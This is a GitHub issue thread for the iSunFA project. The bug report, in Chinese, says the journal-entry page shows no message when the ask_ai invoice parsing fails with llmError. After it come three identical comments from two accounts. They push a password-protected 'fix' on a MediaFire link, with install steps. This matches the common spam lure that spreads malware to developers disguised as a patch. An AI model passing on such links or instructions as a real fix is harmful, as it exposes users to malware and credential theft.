### ISSUE TITLE
🐛 [BUG] 新增日記帳頁面 - ask_ai 已回傳解析失敗頁面沒有對應的提示

### ISSUE THREAD

**Issue by TzuHanLiang** [CAFECA-IO/iSunFA#2201]
### 上傳發票的時候
ask_ai: response llmError (https://isunfa.com/api/v1/company/10000240/ask_ai/da94c0b3dceae67b945c/status)
畫面沒有對應提示
<img width="1680" alt="Screenshot 2024-08-27 at 11 06 43 AM" src="https://github.com/user-attachments/assets/bdc781cd-5414-4c37-84ac-dec2c1b1053a">

_Originally posted by @TzuHanLiang in https://github.com/CAFECA-IO/iSunFA/issues/2199#issuecomment-2311502128_

**Comment by amir1387aht** [comment]
to fix your trouble try download this fix, i see it in another issue,
https://app.mediafire.com/3ag3jpquii3of
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by amir1387aht** [comment]
to fix your trouble try download this fix, i see it in another issue,
https://app.mediafire.com/3ag3jpquii3of
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by jia6214876** [comment]
to fix your trouble try download this fix, i see it in another issue,
https://app.mediafire.com/3ag3jpquii3of
password: changeme
when you installing, you need to place a check in install to path and select "gcc."
